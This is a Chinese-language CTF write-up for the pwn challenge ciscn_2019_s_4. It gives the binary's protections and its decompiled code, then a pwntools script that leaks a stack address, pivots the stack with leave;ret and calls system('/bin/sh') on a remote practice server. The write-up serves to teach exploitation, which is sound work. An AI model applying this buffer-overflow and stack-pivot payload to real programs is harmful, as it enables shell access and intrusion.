HugeH4rD

ciscn_2019_s_4

Ubuntu 18

0x01

checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_s_4/ciscn_s_4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//
    PIE:      No PIE (0x8048000)

IDA

vul()

int vul()
{
  char s[40]; // [esp+0h] [ebp-28h] BYREF

  memset(s, 0, 0x20u);
  read(0, s, 0x30u);
  printf("Hello, %s\n", s);
  read(0, s, 0x30u);
  return printf("Hello, %s\n", s);
}

可疑函数hack()

int hack()
{
  return system("echo flag");
}

0x02

思路

s = 0x28 read可以接受0x30 0x30-0x28-0x4 = 4 只够填充调用了,无法加上参数

─$ ROPgadget --binary ciscn_s_4 --only "leave|ret"  
Gadgets information
============================================================
0x080484b8 : leave ; ret
0x080483a6 : ret
0x080484ce : ret 0xeac1

Unique gadgets found: 3

利用第一次read()溢出泄露出栈上的地址

计算rbp与buf之间的偏移 gdb动调偏移为0x38

布置栈,发送/bin/sh

0x03

from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './'
io = remote('node4.buuoj.cn', 28684)
# io = process([path])
# libc =
# elf = ELF(path)

payload = flat(b'a' * 0x24, b'b'*4)
io.sendafter(b'name?', payload)
stack = u32(io.recvuntil(b'\xff')[-4:])
print('[+] stack_address -->', hex(stack))
system = 0x8048400
leave_ret = 0x080484b8  # leave ; ret
buf = stack - 0x38
payload1 = flat(system, b'a' * 4, buf + 12, b'/bin/sh\x00', b'a' * 20, buf - 0x4, leave_ret)
io.sendline(payload1)
io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

ciscn_2019_s_4

0x01

checksec

IDA

0x02

0x03

Zelas2Xerath